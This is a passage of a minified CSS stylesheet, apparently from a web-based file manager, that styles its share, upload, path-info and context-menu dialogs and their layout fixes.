#folder-list-tree{bottom:70px;}.dropdown-menu.menu-topbar-user{right:6px;}.version-vip{height:26px;line-height:26px;padding:0;opacity:0.7;filter:alpha(opacity=70);padding-left:25px;cursor:pointer;font-size:12px;display:block;color:#eee;background:#999;}.version-vip#version_vip_1{color:#bdeaff;background:#03a9f4;}.version-vip#version_vip_2{color:#ea9df7;background:#9c27b0;}.version-vip#version_vip_3,.version-vip#version_vip_4,.version-vip#version_vip_5,.version-vip#version_vip_6{color:#fff;background:#ffc107;}.version-vip:hover{opacity:0.9;filter:alpha(opacity=90);text-decoration:none;}.version-license{width:250px;height:250px;overflow:hidden;position:absolute;z-index:9999;pointer-events:none;top:30px;left:0px;}.version-license a.line{position:absolute;pointer-events:all;width:300px;height:60px;line-height:60px;left:-70px;top:40px;font-size:20px;background:#4CAF50;text-decoration:none;-webkit-transform:rotate(-45deg);-moz-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-transition:all 0.2;-moz-transition:all 0.2;-o-transition:all 0.2;-ms-transition:all 0.2;transition:all 0.2;text-align:center;color:#fff;opacity:0.9;filter:alpha(opacity=90);}.version-license a.line:hover{opacity:0.7;filter:alpha(opacity=70);}.path-select-input{width:550px;padding:7px;background:rgba(255,255,255,0.3);border:1px solid rgba(100,100,100,0.3);color:#000;}.aui-state-lock .aui-min{display:none;}.dialog-copyright{width:400px !important;}.dialog-copyright,.share-dialog,.check-version-dialog{min-width:400px;}.dialog-copyright.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer{overflow:inherit;box-shadow:0 0px 60px rgba(0,0,0,0.4);border-radius:5px;border:none;}.dialog-copyright.dialog-simple .aui-outer,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in,.share-dialog.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in,.check-version-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-main,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.share-dialog.dialog-simple .aui-outer .aui-main,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.check-version-dialog.dialog-simple .aui-outer .aui-main,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-header,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.share-dialog.dialog-simple .aui-outer .aui-header,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.check-version-dialog.dialog-simple .aui-outer .aui-header,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header{border:none;}.dialog-copyright.dialog-simple .aui-header,.share-dialog.dialog-simple .aui-header,.check-version-dialog.dialog-simple .aui-header{background:transparent;opacity:1.0;filter:alpha(opacity=100);border:none;}.dialog-copyright.dialog-simple .aui-nw,.dialog-copyright.dialog-simple .aui-n,.dialog-copyright.dialog-simple .aui-ne,.dialog-copyright.dialog-simple .aui-w,.dialog-copyright.dialog-simple .aui-e,.dialog-copyright.dialog-simple .aui-sw,.dialog-copyright.dialog-simple .aui-s,.dialog-copyright.dialog-simple .aui-se,.share-dialog.dialog-simple .aui-nw,.share-dialog.dialog-simple .aui-n,.share-dialog.dialog-simple .aui-ne,.share-dialog.dialog-simple .aui-w,.share-dialog.dialog-simple .aui-e,.share-dialog.dialog-simple .aui-sw,.share-dialog.dialog-simple .aui-s,.share-dialog.dialog-simple .aui-se,.check-version-dialog.dialog-simple .aui-nw,.check-version-dialog.dialog-simple .aui-n,.check-version-dialog.dialog-simple .aui-ne,.check-version-dialog.dialog-simple .aui-w,.check-version-dialog.dialog-simple .aui-e,.check-version-dialog.dialog-simple .aui-sw,.check-version-dialog.dialog-simple .aui-s,.check-version-dialog.dialog-simple .aui-se{height:0px;width:0px;background:none;}.dialog-copyright.dialog-simple .aui-inner,.share-dialog.dialog-simple .aui-inner,.check-version-dialog.dialog-simple .aui-inner{border:none;background:none;}.dialog-copyright.dialog-simple .aui-title,.share-dialog.dialog-simple .aui-title,.check-version-dialog.dialog-simple .aui-title{opacity:0.01;filter:alpha(opacity=1);top:0px;position:absolute;width:100%;height:100%;z-index:5;}.dialog-copyright.dialog-simple .aui-min,.dialog-copyright.dialog-simple .aui-max,.share-dialog.dialog-simple .aui-min,.share-dialog.dialog-simple .aui-max,.check-version-dialog.dialog-simple .aui-min,.check-version-dialog.dialog-simple .aui-max{display:none;}.dialog-copyright.dialog-simple .aui-title-bar,.share-dialog.dialog-simple .aui-title-bar,.check-version-dialog.dialog-simple .aui-title-bar{bottom:0px;overflow:hidden;height:100px;position:absolute;margin-top:-120px;top:120px;margin-left:0px;border-radius:4px;}.dialog-copyright.dialog-simple .aui-close,.share-dialog.dialog-simple .aui-close,.check-version-dialog.dialog-simple .aui-close{opacity:0.6;filter:alpha(opacity=60);background:rgba(0,0,0,0.5);width:100px;height:100px;top:-50px;right:-50px;border-radius:50px;text-align:left;font-size:20px;z-index:100;padding:0;}.dialog-copyright.dialog-simple .aui-close:hover,.share-dialog.dialog-simple .aui-close:hover,.check-version-dialog.dialog-simple .aui-close:hover{opacity:0.6;filter:alpha(opacity=60);}.dialog-copyright.dialog-simple .aui-close:active,.share-dialog.dialog-simple .aui-close:active,.check-version-dialog.dialog-simple .aui-close:active{opacity:1.0;filter:alpha(opacity=100);}.dialog-copyright.dialog-simple .aui-close::before,.share-dialog.dialog-simple .aui-close::before,.check-version-dialog.dialog-simple .aui-close::before{padding-left:22px;line-height:140px;}.dialog-copyright .aui-footer,.share-dialog .aui-footer,.check-version-dialog .aui-footer{display:none;}.check-version-dialog .update-box{margin-top:0px;}.share-dialog .content-box .content-info .input-line .open-window,.pathinfo .input-group-btn .open-window{margin-right:-1px;border-radius:0px;}.dialog-copyright .dialog-copyright-content,.check-version-dialog .aui-content{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;width:auto;border-radius:6px;width:400px;-webkit-box-shadow:0px 10px 60px rgba(0,0,0,0.4);-moz-box-shadow:0px 10px 60px rgba(0,0,0,0.4);box-shadow:0px 10px 60px rgba(0,0,0,0.4);border:1px solid #ccc \9;padding-bottom:30px;background:#fff;background:rgba(255,255,255,0.9);}.dialog-copyright .dialog-copyright-content .title,.check-version-dialog .aui-content .title{width:100%;background:#6699cc url("../../../images/common/login.png");height:150px;padding-top:0px;border-top-left-radius:5px;border-top-right-radius:5px;}.dialog-copyright .dialog-copyright-content .title .logo,.check-version-dialog .aui-content .title .logo{text-align:center;font-size:35px;width:100%;padding-top:40px;color:#aaddff;-webkit-box-reflect:below -13px -webkit-gradient(linear,left top,left bottom,from(transparent),to(rgba(255,255,255,0.2)));background-image:-webkit-linear-gradient(92deg,#FFFFFF,#14A1FF);-webkit-background-clip:text;-webkit-text-fill-color:transparent;-webkit-animation:hue 6s 100 linear;}.dialog-copyright .dialog-copyright-content .title .logo i,.check-version-dialog .aui-content .title .logo i{color:#aaddff;font-weight:400;margin-right:10px;}.dialog-copyright .dialog-copyright-content .title .info,.check-version-dialog .aui-content .title .info{text-align:right;font-size:1.15em;color:#aaddff;padding-right:14px;padding-top:30px;}.dialog-copyright .dialog-copyright-content .content,.check-version-dialog .aui-content .content{padding:20px;}.dialog-copyright .dialog-copyright-content .content p,.check-version-dialog .aui-content .content p{text-indent:2em;color:#333;margin-bottom:30px;}.dialog-copyright .dialog-copyright-content .content a,.check-version-dialog .aui-content .content a{padding-right:5px;}.dialog-copyright .dialog-copyright-content .content div,.check-version-dialog .aui-content .content div{text-align:center;padding-bottom:5px;}.check-version-dialog.dialog-simple .aui-title-bar{margin-top:-120px;}.share-dialog .content-box{-webkit-box-shadow:0 5px 30px rgba(0,0,0,0.5);-moz-box-shadow:0 5px 30px rgba(0,0,0,0.5);box-shadow:0 5px 30px rgba(0,0,0,0.5);border-radius:5px;background:#fff;border:1px solid #ccc \9;width:auto;}.share-dialog .content-box .title{width:100%;color:#fff;height:100px;border-radius:5px 5px 0 0;background:#6699cc url('../../../images/common/login.png');}.share-dialog .content-box .titleinfo{text-align:center;font-size:35px;height:60px;overflow:hidden;line-height:80px;}.share-dialog .content-box .titleinfo i{color:#dff;font-size:30px;padding-right:10px;}.share-dialog .content-box .share-view-info{width:200px;margin:0 auto;margin-top:0px;padding:1px 5px;text-align:center;border-radius:17px;background:#117eaf;background:rgba(0,0,0,0.2);opacity:0.8;filter:alpha(opacity=80);}.share-dialog .content-box .content-info{padding:10px;padding-left:20px;}.share-dialog .content-box .content-info .input-line{margin:6px 0 8px 0;position:relative;}.share-dialog .content-box .content-info .input-line .input-title{display:block;width:80px;padding-top:4px;float:left;height:30px;padding-right:10px;text-align:right;}.share-dialog .content-box .content-info .input-line input[type="text"]{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:32px;line-height:30px;padding:0px 5px;width:150px;margin-right:10px;float:left;border-radius:3px;}.share-dialog .content-box .content-info .input-line input[type="text"]:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.share-dialog .content-box .content-info .input-line label{margin-top:8px;margin-right:10px;}.share-dialog .content-box .content-info .input-line label input{margin:0 5px 5px 0;}.share-dialog .content-box .content-info .input-line .desc{font-size:1em;color:#bbb;font-style:normal;padding-left:0px;}.share-dialog .content-box .content-info .input-line .share-name{width:215px;margin-right:10px;}.share-dialog .content-box .content-info .input-line .share-url{margin-right:0;border-radius:3px 0 0 3px;width:167px !important;height:33px;}.share-dialog .content-box .content-info .input-line .share-more{line-height:33px;}.share-dialog .content-box .content-info .input-line .input-group-btn{float:left;}.share-dialog .content-box .content-info .input-line .dropdown-toggle{margin-left:-5px;border-radius:0 3px 3px 0;}.share-dialog .content-box .content-info .input-line .open-window{margin-left:-12px;}.share-dialog .content-box .content-info .input-line .share-copy{width:60px;border-radius:0px;margin-left:-7px;}.share-dialog .content-box .content-info .input-line.select-path input[type="text"]{width:155px;}.share-dialog .content-box .content-info .input-line.select-path a.select-btn{margin-left:-14px;padding:5px 8px 5px;font-size:15px;border-top-left-radius:0px;border-bottom-left-radius:0px;}.share-dialog .content-box .content-info .share-others{margin:-8px 0 -8px 0;}.share-dialog .content-box .share-action{border-top:1px solid #eee;background:#f8f8f8;height:60px;border-radius:0 0 4px 4px;}.share-dialog .content-box .share-action button{float:right;margin:10px 20px 10px 0px;outline:0;}.share-dialog .content-box .share-action .share-remove-button,.share-dialog .content-box .share-action .remove-button{float:right;margin-top:18px;color:#888;margin-right:20px;font-size:14px;}.share-dialog .content-box .share-action .share-remove-button:hover,.share-dialog .content-box .share-action .remove-button:hover{color:#f30;}.file-list-icon .file{position:relative;}.file-list-icon .file .download{position:absolute;bottom:4px;margin-left:45px;opacity:0.5;filter:alpha(opacity=50);}.file-list-icon .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:30px;line-height:30px;width:30px;color:#aaa;}.file-list-list .file{position:relative;}.file-list-list .file .download{position:absolute;bottom:-2px;margin-left:45px;left:180px;z-index:99;opacity:0.5;filter:alpha(opacity=50);}.file-list-list .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:28px;line-height:28px;width:28px;color:#aaa;}.pathSelectApi .aui-footer .aui-buttons{padding:15px;}.pathSelectApi .aui-footer .label{position:absolute;right:175px;margin-top:6px;opacity:0.7;filter:alpha(opacity=70);}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{opacity:0.7;filter:alpha(opacity=70);color:#08c !important;}body div.file-continer .file.file-not-readable,body div.file-continer .file.file-not-readable.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-readable,body .frame-main .frame-left .ztree li a.file-not-readable.file-not-writeable{opacity:0.4;filter:alpha(opacity=40);color:#a00 !important;}.url-link input{border:1px solid #ddd;background:#fff;line-height:30px;height:30px;width:300px;margin-bottom:15px;padding:0 5px;}.aui-content .ajaxError{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;color:#f60;position:absolute;left:0px;right:0px;bottom:0px;top:40px;overflow:auto;padding:10px;}.pathinfo{font-size:1em;width:350px;min-height:300px;padding:20px 0 10px 0;color:#446;}.pathinfo .line{width:95%;margin:8px auto 8px auto;height:0px;border-bottom:1px solid #eee;}.pathinfo .download-url{padding:0px 5px;width:140px;line-height:32px;height:32px;}.pathinfo .p{margin-bottom:2px;}.pathinfo .p .icon{width:40px;height:40px;float:left;border:1px solid #f6f6f6;margin-left:10px;}.pathinfo .p input.info-chmod{padding:0px 10px;width:55px;color:#999;margin-right:10px;display:inline-block;height:25px;line-height:25px;}.pathinfo .p .title{width:80px;float:left;color:#888;text-align:right;}.pathinfo .p .content{float:left;width:240px;word-break:break-all;color:#666;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;font-size:1em;margin-left:15px;}.pathinfo .p .content.file-md5-loading{background:url("../../../images/common/loading.gif") 18px 5px no-repeat;}.pathinfo input{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;line-height:28px;padding:2px 5px;width:150px;float:left;height:28px;border-radius:3px;}.pathinfo input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.pathinfo .download-url{margin-right:0;border-radius:3px 0 0 3px;}.file-drag-upload .aui-content{overflow-y:scroll;}.fileupload{padding-left:25px;}.fileupload span.status{padding-left:10px;font-size:10px;color:#f96;}.movie-player-dialog{overflow:hidden;}.flash-player{width:100%;height:100%;}.wmp-player{width:0%;height:0%;}.movie-player-dialog .aui-content{background:#000;}.dialog-path-remove .aui-content{word-wrap:break-word;width:auto;}.server-dwonload-textarea textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.server-dwonload-textarea textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.file-upload-box{height:385px;padding:5px;min-width:365px;overflow:hidden;}.file-upload-box .topbar-nav{border-bottom:1px solid #ddd;margin-top:6px;}.file-upload-box .menu{display:block;text-decoration:none;float:left;padding:0px 15px;height:26px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fff,#eee);background-image:-moz-linear-gradient(top,#fff,#eee);background-image:-o-linear-gradient(top,#fff,#eee);background-image:-ms-linear-gradient(top,#fff,#eee);background-image:linear-gradient(top,#fff,#eee);-pie-background:linear-gradient(to top,#fff,#eee);font-size:1em;border:1px solid #ccc;text-align:center;line-height:24px;margin-right:5px;margin-bottom:-1px;color:#444;border-radius:4px 4px 0 0;}.file-upload-box .menu.this{background:#fff;border-bottom:1px solid #fff;}.file-upload-box .menu:hover{background:#fff;}.file-upload-box .upload-box{margin-top:10px;}.file-upload-box .download-btn-group{margin-left:-10px;margin-top:-2px;margin-top:-4px \9;}.file-upload-box .download-btn-group .download-start{border-radius:0px;}.file-upload-box .upload-box-tips .btn.btn-default{border-radius:3px;color:#555;}.file-upload-box .upload-box-tips .btn-group>.btn:last-child:not(:first-child),.file-upload-box .upload-box-tips .btn-group>.dropdown-toggle:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0;}.file-upload-box div a.left{margin-left:10px;}.file-upload-box div a.right{position:absolute;right:5px;}.file-upload-box span.info{font-size:1em;font-style:italic;padding:0px 0 5px 10px;}.file-upload-box i{font-size:1em;color:#aaa;padding-left:10px;}.file-upload-box .list{margin:10px 15px 10px 0;}.file-upload-box .list input{margin-left:10px;width:190px;height:22px;line-height:24px;padding:0px 3px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.file-upload-box .list input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.file-upload-box .submit input{float:right;padding:4px 20px;background:#ddd;border:none;margin-right:36px;margin-top:10px;}.file-upload-box .submit input:hover{background:#bbb;}.file-upload-box .submit input:active{background:#444;color:#fff;}.file-upload-box .uploader-content{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;background:url("../../../images/common/drop_upload.png") no-repeat center;}.file-upload-box #downloader{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;}.file-upload-box .webuploader-container{position:relative;}.file-upload-box .webuploader-element-invisible{position:absolute !important;clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px);}.file-upload-box .webuploader-pick{position:relative;display:inline-block;color:#fff;text-align:center;height:27px;line-height:27px;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);cursor:pointer;padding:0px 15px;}.file-upload-box .webuploader-pick-hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .upload-cert{width:24px;background:#def;height:100%;float:left;cursor:pointer;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);height:27px;line-height:27px;position:relative;z-index:10;padding:0;border:none;margin-left:-5px;border-left:1px solid rgba(0,0,0,0.1);border-top-right-radius:3px;border-bottom-right-radius:3px;}.file-upload-box .upload-cert .caret{margin-top:-2px;margin-left:-1px;border-top:4px solid #fff;}.file-upload-box .upload-cert-box .dropdown-menu{right:inherit;top:inherit;margin-top:30px;}.file-upload-box .upload-cert-box .dropdown-menu:before{right:inherit;left:10px;}.file-upload-box .upload-cert-box .dropdown-menu:after{right:inherit;left:11px;}.file-upload-box .upload-cert-box.open.upload-cert,.file-upload-box .upload-cert-box .upload-cert:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .webuploader-pick-disable{opacity:0.6;filter:alpha(opacity=60);pointer-events:none;}.file-upload-box .btns{margin-bottom:10px;font-size:1em;height:28px;}.file-upload-box .btns .tips{float:right;line-height:30px;}.file-upload-box .btns #picker{float:left;}.file-upload-box .upload-box-tips{line-height:34px;color:#888;position:absolute;right:10px;}.file-upload-box .upload-box-config{box-shadow:inset 0px 1px 6px rgba(0,0,0,0.3);border-radius:2px;margin-bottom:10px;padding:4px;}.file-upload-box .upload-box-config .upload-check-box{margin-left:10px;}.file-upload-box .upload-box-config label{margin-left:15px;}.file-upload-box .upload-box-config label input{margin-right:5px;}.file-upload-box .uploader-list .item,.file-upload-box .download-list .item{padding:0px;height:35px;overflow:hidden;position:relative;border-bottom:1px solid #ccc;background:#fefefe;}.file-upload-box .uploader-list .item .info,.file-upload-box .download-list .item .info{color:#224;line-height:35px;padding:0 5px;z-index:100;position:relative;font-size:1em;}.file-upload-box .uploader-list .item .info span,.file-upload-box .uploader-list .item .info a,.file-upload-box .download-list .item .info span,.file-upload-box .download-list .item .info a{float:left;height:30px;display:block;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}.file-upload-box .uploader-list .item .info .title,.file-upload-box .download-list .item .info .title{color:#3A87AD;width:160px;width:50%;font-weight:800;}.file-upload-box .uploader-list .item .info .size,.file-upload-box .download-list .item .info .size{width:45px;text-align:center;color:#3A87AD;font-size:12px;}.file-upload-box .uploader-list .item .info .state,.file-upload-box .download-list .item .info .state{width:100px;width:27%;text-align:right;font-size:12px;}.file-upload-box .uploader-list .item .info .font-icon,.file-upload-box .download-list .item .info .font-icon{margin-left:12px;font-size:20px;width:20px;line-height:35px;cursor:pointer;color:#bbb;}.file-upload-box .uploader-list .item .info .font-icon:hover,.file-upload-box .download-list .item .info .font-icon:hover{text-decoration:none;color:#f60;}.file-upload-box .uploader-list .item .info .icon-ok,.file-upload-box .download-list .item .info .icon-ok{color:#40AA53;}.file-upload-box .uploader-list .item .info .error,.file-upload-box .download-list .item .info .error{color:#f30;}.file-upload-box .uploader-list .item.success,.file-upload-box .download-list .item.success{background:#eaf8ff;}.file-upload-box .uploader-list .item.error,.file-upload-box .download-list .item.error{background:#ffe8e6;}.file-upload-box .uploader-list .item .progress,.file-upload-box .download-list .item .progress{height:38px;margin:0px;width:100%;border-radius:0;box-shadow:none;position:absolute;top:0;}.file-upload-box .uploader-list .item .progress-bar,.file-upload-box .download-list .item .progress-bar{background-color:#adf;background-image:linear-gradient(45deg,rgba(255,255,255,0.35) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.35) 50%,rgba(255,255,255,0.35) 75%,transparent 75%,transparent);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ddeeff',endColorstr='#88ccff',GradientType=1);BACKGROUND-REPEAT:repeat-x;}.file-upload-box .uploader-list .success:hover,.file-upload-box .download-list .success:hover{cursor:pointer;background:#def;border-bottom:1px solid #3A87AD;}@media screen and (-ms-high-contrast:active),(-ms-high-contrast:none){.btn{ padding:5px 14px;} input[type='checkbox'].kui-checkbox-ios.size-big + em{ height:27px;} #body .system-content .right-frame .user-list table tr td.select input{ position:relative;top:4px;} #body table tr input[type='text']{ line-height:22px;} .do-search-box .search-header .btn-right{ margin:-9px 0 0 -2px;height:23px;} .appbox .appline.icon .open{ margin-top:-2px;} .appbox .appline label{ position:relative;top:-4px;} #body .main .group-editor .tag input{ position:relative;top:-5px;} .share-dialog .aui-border{ overflow:auto;} .share-dialog .content-box .content-info .input-line.select-path a.select-btn{ padding:3px 8px 4px;} .kui-radio + span, .kui-checkbox + span{ position:relative;top:-6px;} .kui-radio.size-small + span, .kui-checkbox.size-small + span{ position:relative;top:-4px;} .kui-radio.size-smallx + span, .kui-checkbox.size-smallx + span{ position:relative;top:-2px;}}@media (max-width:743px){html #body .app-menu-left, html body .app-menu-left{ width:50px;min-width:50px;} html #body .app-menu-left .search{ opacity:0.001;} html #body .menu-left .setting a.selected, html body .menu-left .setting a.selected{ padding-left:0px;margin-left:-5px;} html #body .main.app-content, html body .main.app-content{ left:50px;} html #body .main.app-content .app-list, html body .main.app-content .app-list{ justify-content:space-around;} html .form-box .form-row .setting-title{ text-align:left;} html .form-box .form-row.form-userSelect .setting-content{ padding:10px 5%;} html .form-box .form-row .setting-content{ width:90%;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{ width:100%;height:40px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{ left:0px;top:80px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{ float:left;} html #body.plugin-page .app-menu-left .line, html body.plugin-page .app-menu-left .line{ padding:4px 0;} html body #body .menu-left, html body #body .app-menu-left{ width:50px;min-width:50px;} html body #body .menu-left h1, html body #body .app-menu-left h1{ font-size:14px;font-weight:800 !important;padding:10px 0px 10px 0px;text-align:center;} html body #body .menu-left .font-icon, html body #body .app-menu-left .font-icon{ padding-right:30px;} html #body .setting-tools-right, html body .setting-tools-right{ top:0;} html #body .main .nav a, html body .main .nav a{ padding:5px 10px;} html #body .main .nav, html body .main .nav{ margin-right:0px;} html #body .setting-tab, html body .setting-tab, html #body .system-content, html body .system-content{ margin-right:10px;} html #body .main, html body .main{ left:50px;width:auto;margin-right:10px;} html .form-box .form-row .desc, html .form-box .form-row .setting-content i{ display:block;} html #body .setting-tab .form-row, html body .setting-tab .form-row, html #body .system-content .form-row, html body .system-content .form-row{ background:#fafafa;border-radius:4px;padding:0 5px;} html .form-box .form-row .setting-title{ height:20px;line-height:20px;} html .form-box .form-row{ padding:0;} html .form-box .form-row input[type='text'], html .form-box .form-row input[type='password'], html .form-box .form-row input[type='number']{ width:180px;} html .form-box .form-row #wallpage-url{ width:150px !important;} html #body .main .section .content .box p, html body .main .section .content .box p{ text-indent:10px;} html #body .system-content.setting-member{ width:800px;} html body.setting-page .select-user-group .right-content, html body.setting-page .select-user-group .left-content{ width:170px;} html .topbar .content .top-right ul.dropdown-menu.topbar-language{ width:235px;max-height:800px;} html #body .main .section .box, html body .main .section .box{ margin-right:10px;} html #body .main .section .box .list, html body .main .section .box .list{ width:95px;height:95px;} html #body .main .section .box .list .ico, html body .main .section .box .list .ico{ width:75px;height:60px;} html #body .panel, html body .panel{ margin-right:0px;} html #body .main.app-content .app-list .app-li, html body .main.app-content .app-list .app-li{ margin:0 5px 20px 0;width:130px;} html #body .main.app-content .app-model, html body .main.app-content .app-model{ padding:10px;}}@-webkit-keyframes fadein{0%{ opacity:0;} 50%{ opacity:0.4;}}.playmusic-icon{display:none;}.context-menu-list{margin:0;margin-left:4px;min-width:190px;max-width:300px;font-size:1em;display:inline-block;position:absolute;list-style-type:none;padding:8px 0px;border:none;border:1px solid #ccc \9;border-radius:4px;background:#fff;-webkit-box-shadow:0 10px 80px rgba(0,0,0,0.4);-moz-box-shadow:0 10px 80px rgba(0,0,0,0.4);box-shadow:0 10px 80px rgba(0,0,0,0.4);}.context-menu-list span b{display:inline-block;font-size:1em;font-weight:200;color:#aaa;padding-left:10px;min-width:50px;text-align:right;overflow:hidden;position:absolute;right:10px;width:65px;}.context-menu-list .hover>span>b{color:#fff;}.context-menu-list.menu-auto-fit{top:5px !important;}.context-menu-list li.selected{border-left:none !important;background:none;}.context-menu-list li.selected i.font-icon{color:#aaa;font-family:FontAwesome;font-weight:normal;font-style:normal;}.context-menu-list li.selected i.font-icon:before{content:"\f00c" !important;}.context-menu-list .context-menu-submenu:after{content:"\f0da";font-family:FontAwesome;display:inline-block;float:right;margin-right:0px;right:10px;position:absolute;}.context-menu-list .context-menu-item{display:block;cursor:pointer;white-space:nowrap;clear:both;line-height:25px;height:23px;position:relative;border:none;padding:0px 20px 0 15px;color:#222;-webkit-transition:background-color .1s;-moz-transition:background-color .1s;-o-transition:background-color .1s;-ms-transition:background-color .1s;transition:background-color .1s;}.context-menu-list .context-menu-item .font-icon{display:inline-block;width:16px;text-align:center;font-size:1.2em;color:#aaa;margin-right:15px;vertical-align:middle;margin-top:-2px;padding:0;}.context-menu-list .context-menu-item.disabled,.context-menu-list .context-menu-item.disable{cursor:not-allowed;pointer-events:auto;color:#ccc;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{color:#ddd;}.context-menu-list .context-menu-item.disabled.hover,.context-menu-list .context-menu-item.disable.hover{color:#ccc;cursor:default;background-color:#fff;}.context-menu-list .context-menu-item.disabled.hover .font-icon,.context-menu-list .context-menu-item.disable.hover .font-icon{color:#ddd;}.context-menu-list .context-menu-item.hover{cursor:pointer;color:#fff;background:#63acff;background-color:none \9;}.context-menu-list .context-menu-item.hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item span i{float:right;text-align:right;font-style:normal;color:#888;}.context-menu-list .context-menu-item.context-menu-separator{height:2px;line-height:0;border-bottom:1px solid #eee;margin:2px 0 4px;}.context-menu-list .context-menu-item > .context-menu-list{display:none;right:-5px;top:5px;}.context-menu-list .context-menu-item.hover > .context-menu-list{display:block;}.context-menu-list .context-menu-item.hover > .context-menu-list .font-icon{color:#aaa;}.context-menu-list .context-menu-item.hover > .context-menu-list .hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item .context-menu-accesskey{text-decoration:underline;}.context-menu-list .context-menu-item .line-top{border-top:1px solid #ddd 